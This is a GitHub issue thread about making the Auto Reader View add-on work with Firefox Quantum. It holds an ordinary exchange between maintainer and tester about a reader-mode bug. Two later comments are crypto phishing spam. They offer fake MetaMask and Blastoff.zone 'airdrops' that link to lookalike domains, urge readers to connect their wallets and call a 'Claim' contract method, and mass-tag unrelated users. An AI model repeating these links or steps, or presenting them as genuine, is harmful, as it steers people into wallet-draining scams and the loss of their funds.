### ISSUE TITLE
Firefox Quantum compatibility

### ISSUE THREAD

**Issue by reaganch** [pmarchwiak/auto-reader-view#4]
Any plans of revising this addon to make it compatible with Firefox Quantum (v57)?

**Comment by pmarchwiak** [comment]
Yes, I've been working on it here and there when I get some spare time. Let me know if you're willing to help out or test and I can try to get a branch up with the current version.

**Comment by reaganch** [comment]
Would love to help test. Would need instructions on how to build the addon from your source code though.

**Comment by pmarchwiak** [comment]
@reaganch I released a new version of the addon, 1.0.2, that's compatible with Quantum. It depends on an API method only available in v58 so you'll have to use Firefox Beta, Developer or Nightly to test. Feel free to comment here or file issues for any problems you find. Thanks for the help!

**Comment by reaganch** [comment]
Thanks. I'm running Firefox Beta right now, which is still at v57. Will install this as soon as it updates to v58 and test. Although I'm a bit unclear on how to install the addon to test. The zip file I download from the "Releases" section contains no xpi files.

**Comment by pmarchwiak** [comment]
Ah, you're right. Currently Beta is at v57, which unfortunately won't work with the addon due to the aforementioned API incompatibility. You would have to try installing Developer or Nightly to test and then you should be able to install it via https://addons.mozilla.org/en-US/firefox/addon/auto-reader-view/ .

**Comment by reaganch** [comment]
Gotit. Will unfortunately not be able to test the addon this week since I'll be traveling. Will give it a spin next week and report here. Thanks again for putting this together!

**Comment by reaganch** [comment]
Just updated to Firefox v58.0b4 on Linux Mint 18.2 and installed the addon.
Opening a blog and clicking on the "Auto Reader Mode" button followed by "Enable" instantly makes the blog appear in reader mode, but opening the blog again results in it appearing in regular mode instead of reader mode, although a green check mark appears on the "Auto Reader Mode" button. Clicking on the "Auto Reader Mode" button now allows the option of disabling on the domain.

**Comment by pmarchwiak** [comment]
Thanks, I was able to reproduce this. I'll let you know when I have a fix ready.

**Comment by mesidharth** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @loqman, @simonccarter, @Xpider, @astrostl, @leshill, @tinvernizzi, @asketak

**Comment by uc-Pri** [comment]
# Blastoff.zone Airdrop: Win 0.1 ETH + $100 Bonus!

[![Airdrop Banner](https://i.ytimg.com/vi/QtjkR9zWyzI/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

Hello crypto community! Blastoff.zone is offering an exciting Airdrop for the first 10 users! You can win 0.1 ETH plus a $100 bonus just by participating and connecting your wallet.

## How to participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to access the Blastoff.zone website.
2. Connect your Ethereum wallet to the website to be eligible for the $100 bonus.
3. Use the "Claim Now" method to receive your tokens.

Don't miss out on this amazing opportunity! Hurry and claim your prize before the 0.1 ETH runs out.

Remember, tokens will be distributed on a first-come, first-served basis. We have a maximum distribution of 100 tokens, and 90% have already been distributed!
alexrigler, @cgaolei, @cgmartin, @hervehobbes, @Oxyrus, @cwjohnston, @SalVader, @prabhic, @Guillermo-Ayala, @BrentGuttmann, @notsu, @aquaqamelob2, @keskinbu, @moimikey, @pdkaizer, @rcanepa, @EDVTAZ, @tjonganthony, @aakashjain, @thiagorock22

**Comment by Xpider** [comment]
你的邮件我已收到~
杨鹏飞
